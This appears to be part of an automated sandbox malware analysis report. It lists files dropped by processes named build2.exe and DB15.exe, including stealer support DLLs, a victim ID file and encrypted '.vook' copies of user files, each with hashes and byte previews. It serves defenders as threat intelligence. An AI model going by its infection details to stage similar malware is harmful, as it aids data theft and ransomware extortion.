                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4714
                                                                                                                                                                                                                                      Entropy (8bit):4.481829322617544
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsWJg771I9KdWpW8VYevYm8M4JYTFayq850Tb9Q3jd:uIjfsI7xs7VxyJ9vba3jd
                                                                                                                                                                                                                                      MD5:CE01907C24BE0B1EEF3132FDD7A4C6E4
                                                                                                                                                                                                                                      SHA1:5E1A8B8D40C38921095FC5A137537D1BCA909627
                                                                                                                                                                                                                                      SHA-256:623C96EC7E4E668237A7A1269E850F39744D271557FD7D4E7E30A5BCAE1CBB51
                                                                                                                                                                                                                                      SHA-512:B25F61F3F1B7806A0DAF043980CF7D54B9DFD6C54CFBB65D1922A4E8BAE4D86F14364B2C316890ABF71380CDE27EC11681D2B8AE6ADF9DF3140D40CB715BD30C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="255354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: i1crvbOZAP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: yU3icg18lq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: EcNghZJd5O.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: PIa51EkBL7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: G2KdVscPB4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: ofrAxT2J4j.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: Rechnung.pdf.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: Esp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: ir95invGki.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: i1crvbOZAP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: yU3icg18lq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: EcNghZJd5O.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: PIa51EkBL7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: G2KdVscPB4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: ofrAxT2J4j.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: Rechnung.pdf.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: Esp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: ir95invGki.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\SystemID\PersonalID.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):42
                                                                                                                                                                                                                                      Entropy (8bit):4.898153434632013
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:9DEjEvxINsf5vN:2jGxssZN
                                                                                                                                                                                                                                      MD5:2F719FDBD51BE742A58ED1711E35125E
                                                                                                                                                                                                                                      SHA1:AFCE4C99F6312EB37637FF7EE5E24C5F77F59AD3
                                                                                                                                                                                                                                      SHA-256:FA22FEA720A688CDD5B304427090FA95C4BE20E928B5E0170B3F15CEDA8CEDFE
                                                                                                                                                                                                                                      SHA-512:AACF91A25A6C5D3288F9E778583FDC163CB023345C3E8925BF56FDFC0B429E864A356AA9A07723E17DD9CA9417E9856C875AB02FBD775C4E6B700D03EAC49C08
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5..

                                                                                                                                                                                                                                      C:\Users\user\.curlrc

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                      Entropy (8bit):7.25027722409106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:KWZeMYaG2Cl2nPm27o8h5gd6dhHGx2Zq6QMiK2jnsJZjGxssZacii96Z:NZeHM97o83i6dhmGq7y27oZixpZaciik
                                                                                                                                                                                                                                      MD5:4AB0ADC57E04D7CB9B738DA007EC77E7
                                                                                                                                                                                                                                      SHA1:51675D5D40532EE7139388BEFC09968F795F2C20
                                                                                                                                                                                                                                      SHA-256:D2959ABEF5832F4768962FCBD1DA49C6390F64D8853A275C9BA327829C669B3D
                                                                                                                                                                                                                                      SHA-512:6E703B91031E9540548EC4A1AD7C366C012B1B4987F9E143CA85006570185E6D5CBBB49148FCEA8E84A3FA4CB94A199C9005937381AE2E528C642343CBC4B221
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:insecy..u...&....*.N"!.,.-.ss..6v.4......}..1)..b..$ ....../..}2...M.dx\.ST2.m.....J...b..........Y9[i.zC..w.E....j%.... .l.Ou#kd.k..[...tw..rL...Oy..a.i..e...}.....c.r....HY.^4...D..14#.....@\.~`.P.W...KjdUM.N.I......4.@.`5..*...(m.j+.y..Y.9...kZ.8X...g .r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\.curlrc.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                      Entropy (8bit):7.25027722409106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:KWZeMYaG2Cl2nPm27o8h5gd6dhHGx2Zq6QMiK2jnsJZjGxssZacii96Z:NZeHM97o83i6dhmGq7y27oZixpZaciik
                                                                                                                                                                                                                                      MD5:4AB0ADC57E04D7CB9B738DA007EC77E7
                                                                                                                                                                                                                                      SHA1:51675D5D40532EE7139388BEFC09968F795F2C20
                                                                                                                                                                                                                                      SHA-256:D2959ABEF5832F4768962FCBD1DA49C6390F64D8853A275C9BA327829C669B3D
                                                                                                                                                                                                                                      SHA-512:6E703B91031E9540548EC4A1AD7C366C012B1B4987F9E143CA85006570185E6D5CBBB49148FCEA8E84A3FA4CB94A199C9005937381AE2E528C642343CBC4B221
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:insecy..u...&....*.N"!.,.-.ss..6v.4......}..1)..b..$ ....../..}2...M.dx\.ST2.m.....J...b..........Y9[i.zC..w.E....j%.... .l.Ou#kd.k..[...tw..rL...Oy..a.i..e...}.....c.r....HY.^4...D..14#.....@\.~`.P.W...KjdUM.N.I......4.@.`5..*...(m.j+.y..Y.9...kZ.8X...g .r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):629
                                                                                                                                                                                                                                      Entropy (8bit):7.621655935451105
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:kMc3IE+kcNbTdaPILJ99D6xYJmiCQ/3nwDpB8fIRfzKVFHzVuixpZacii9a:pcYEpAHNJT33nhIRitzsiTkbD
                                                                                                                                                                                                                                      MD5:C5E47A598E2D58717B8E1F0E1CFFF05E
                                                                                                                                                                                                                                      SHA1:67902A6EA1C4A8E15B13B0A9D50BEB1DA0465B23
                                                                                                                                                                                                                                      SHA-256:CD931E39A865885E556CBE8DDB94B6BBA16DD6061207940081824D8A9AD3244C
                                                                                                                                                                                                                                      SHA-512:3070653060B12F181217AFEC91C0494BEFE43F048B1507FF40328A9A76F59582AE099D065B74EAA8B2E31261946D53BD4EFFD0091EA5C33FC70F39B8DA0E9CA8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:2023/2g...:U.e.?"..=..sd.4...5S.x..8.9P?.....b..E.fX."Ja7...._.-F..-.[+.zb..|.......}.......X.......s..G.>8.....FrJ"{&].n0?..H'....$....B....u.M......o.e.f=.'.@=.b."..~.vi.Is.....6.r....1.....S.......ay.0.<u....'..9^...Q3g...y.H$f.!Yv..O4...r..[.......Q..n.....:..nm.ez.n..oF..."....N..La...r|..q.l.$.|G.]g....B..K..%..pC.^o.<...?.|S@.......'#p..t...I....g'z7...o.}8......"...Ep...F.l)u..1..........$.v.<8.o.SK...w.9..$.l%5.j.......P h......F.i.3.^..b.S&....<..2.8+....{F...oN..E .LY..Z...>..[....!m=bGo.!J.V..\,..3.E.Qr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):629
                                                                                                                                                                                                                                      Entropy (8bit):7.621655935451105
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:kMc3IE+kcNbTdaPILJ99D6xYJmiCQ/3nwDpB8fIRfzKVFHzVuixpZacii9a:pcYEpAHNJT33nhIRitzsiTkbD
                                                                                                                                                                                                                                      MD5:C5E47A598E2D58717B8E1F0E1CFFF05E
                                                                                                                                                                                                                                      SHA1:67902A6EA1C4A8E15B13B0A9D50BEB1DA0465B23
                                                                                                                                                                                                                                      SHA-256:CD931E39A865885E556CBE8DDB94B6BBA16DD6061207940081824D8A9AD3244C
                                                                                                                                                                                                                                      SHA-512:3070653060B12F181217AFEC91C0494BEFE43F048B1507FF40328A9A76F59582AE099D065B74EAA8B2E31261946D53BD4EFFD0091EA5C33FC70F39B8DA0E9CA8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:2023/2g...:U.e.?"..=..sd.4...5S.x..8.9P?.....b..E.fX."Ja7...._.-F..-.[+.zb..|.......}.......X.......s..G.>8.....FrJ"{&].n0?..H'....$....B....u.M......o.e.f=.'.@=.b."..~.vi.Is.....6.r....1.....S.......ay.0.<u....'..9^...Q3g...y.H$f.!Yv..O4...r..[.......Q..n.....:..nm.ez.n..oF..."....N..La...r|..q.l.$.|G.]g....B..K..%..pC.^o.<...?.|S@.......'#p..t...I....g'z7...o.}8......"...Ep...F.l)u..1..........$.v.<8.o.SK...w.9..$.l%5.j.......P h......F.i.3.^..b.S&....<..2.8+....{F...oN..E .LY..Z...>..[....!m=bGo.!J.V..\,..3.E.Qr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):673
                                                                                                                                                                                                                                      Entropy (8bit):7.645808855971373
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:kMCcSU7myXjL1x3MORtOWcza2x6huMeMTwekNQWMCLdiDIn4rUQgYTpuVNRixpZE:hjSUSyXjhlOJ/gVTwt9MWdN4AfYtuVv1
                                                                                                                                                                                                                                      MD5:0B4E1D4C2CA29C208B270885D25BE627
                                                                                                                                                                                                                                      SHA1:35A5D93A24D41510C7DCD0A5F35B94773909C714
                                                                                                                                                                                                                                      SHA-256:AD9F055EFD49EE242AE6F7E6EE1A1D812D7889175ED834C247C39AEFCFAF7534
                                                                                                                                                                                                                                      SHA-512:3C097DEEB78D244B97214A6EF0C8F3CDC2EFB47FF5699E21BA3826AA025CA33BC888771912ADF003AF5D9E9BD646072FB9C411C3DE4043B6AD168B0CC9CA0B81
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:2023/.8.).m.-&.uBTa..'N...~)(...).N/..U.Y....t..Q,z..vk.K?.....(CD..K 4&VMU......N#.u..+.4p...@....uY.+4......s`a.......FK.eC_.~...mc..4Ab.n.H...-....Fqd|..4..[.h..*.i..[d.(.*........=. .p...c......z.\..@..$$E.b]o...zm..!w...>.#`..V.:..lU.]...9..5..~.d^}Q,...ef..X........I....J...,%.sJ..R.JAx[..A....z.v..m.E....+..H76pW.1...m.}.7$...,Nz..L4xU..Z...........5\.@6.s..4.q.x.....(.v..8....P..j....G.... .g*{......l.?`":.0.b...}1.>(6T..|.z;1..P.7..&.WC.jn.&.......Y.^....X.50.....&.*W?<....@v0../..E.c.r6_.I.I................Q.7v.....q..d..],.~("..KW.QWk.,O....JH....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):673
                                                                                                                                                                                                                                      Entropy (8bit):7.645808855971373
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:kMCcSU7myXjL1x3MORtOWcza2x6huMeMTwekNQWMCLdiDIn4rUQgYTpuVNRixpZE:hjSUSyXjhlOJ/gVTwt9MWdN4AfYtuVv1
                                                                                                                                                                                                                                      MD5:0B4E1D4C2CA29C208B270885D25BE627
                                                                                                                                                                                                                                      SHA1:35A5D93A24D41510C7DCD0A5F35B94773909C714
                                                                                                                                                                                                                                      SHA-256:AD9F055EFD49EE242AE6F7E6EE1A1D812D7889175ED834C247C39AEFCFAF7534
                                                                                                                                                                                                                                      SHA-512:3C097DEEB78D244B97214A6EF0C8F3CDC2EFB47FF5699E21BA3826AA025CA33BC888771912ADF003AF5D9E9BD646072FB9C411C3DE4043B6AD168B0CC9CA0B81
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:2023/.8.).m.-&.uBTa..'N...~)(...).N/..U.Y....t..Q,z..vk.K?.....(CD..K 4&VMU......N#.u..+.4p...@....uY.+4......s`a.......FK.eC_.~...mc..4Ab.n.H...-....Fqd|..4..[.h..*.i..[d.(.*........=. .p...c......z.\..@..$$E.b]o...zm..!w...>.#`..V.:..lU.]...9..5..~.d^}Q,...ef..X........I....J...,%.sJ..R.JAx[..A....z.v..m.E....+..H76pW.1...m.}.7$...,Nz..L4xU..Z...........5\.@6.s..4.q.x.....(.v..8....P..j....G.... .g*{......l.?`":.0.b...}1.>(6T..|.z;1..P.7..&.WC.jn.&.......Y.^....X.50.....&.*W?<....@v0../..E.c.r6_.I.I................Q.7v.....q..d..],.~("..KW.QWk.,O....JH....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):818
                                                                                                                                                                                                                                      Entropy (8bit):7.717424056579782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YKWWhVD3YYexszD7xPyC0rQehFSe7rycHBI/K8QKHy8XixpZacii9a:YKWOtPe2JP10rJLSe7rzhICYXiTkbD
                                                                                                                                                                                                                                      MD5:8A827C26345D04E393E35D21240577E1
                                                                                                                                                                                                                                      SHA1:362E2D6032902D1220684A6C9E755AED6A2453F1
                                                                                                                                                                                                                                      SHA-256:40C1A00277882391BA8964D9C508B49D87E58D82F3F5334C13D278CB1FD084ED
                                                                                                                                                                                                                                      SHA-512:DA9E8E7610551768FBF763068896AD32CCE0D9227A0F0E44B6DE5102B8C156F51640491B01FF18D095AE5885FB6010163C796CE6C0E9A0AB266D4B6771CADA67
                                                                                                                                                                                                                                      Malicious:false
